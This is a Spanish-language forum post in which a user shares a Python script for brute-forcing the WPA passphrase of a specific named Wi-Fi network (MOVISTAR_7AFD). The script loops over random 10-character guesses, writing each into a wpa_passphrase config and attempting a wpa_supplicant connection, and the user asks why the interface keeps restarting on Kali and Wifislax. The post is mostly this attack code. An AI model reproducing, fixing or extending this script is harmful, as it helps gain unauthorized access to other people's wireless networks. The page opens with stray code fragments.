?>/script>'; } ?> ataque directo al wpa_supplicant Widgets Magazine

Autor Tema: ataque directo al wpa_supplicant  (Leído 2014 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado sergio44

  • **
  • Mensajes: 6
ataque directo al wpa_supplicant
« en: 23-05-2021, 23:24 (Domingo) »
estado creando un script

fuerza bruta al wpa_passphrase

pero se reinicia la interfaz en



kali linux y en wifislax

#!/usr/bin/env python3
import random
import os
import subprocess

caracteres = "abcdefghijklmnñopqrstuvw***0123456789ABCDEFGHIJKLMNÑOPQRSTUVW***"


while True:
    passwd=""

    for i in range(10):
        passwd += caracteres[random.randrange(len(caracteres))]

    print(passwd)


    print(subprocess.call("wpa_passphrase MOVISTAR_7AFD {} > red.conf".format(passwd),shell=True))
    print(subprocess.call(" sudo wpa_supplicant -B -i wlan0  -c red.conf ".format(passwd),shell=True))
« Última modificación: 24-05-2021, 00:51 (Lunes) por sergio44 »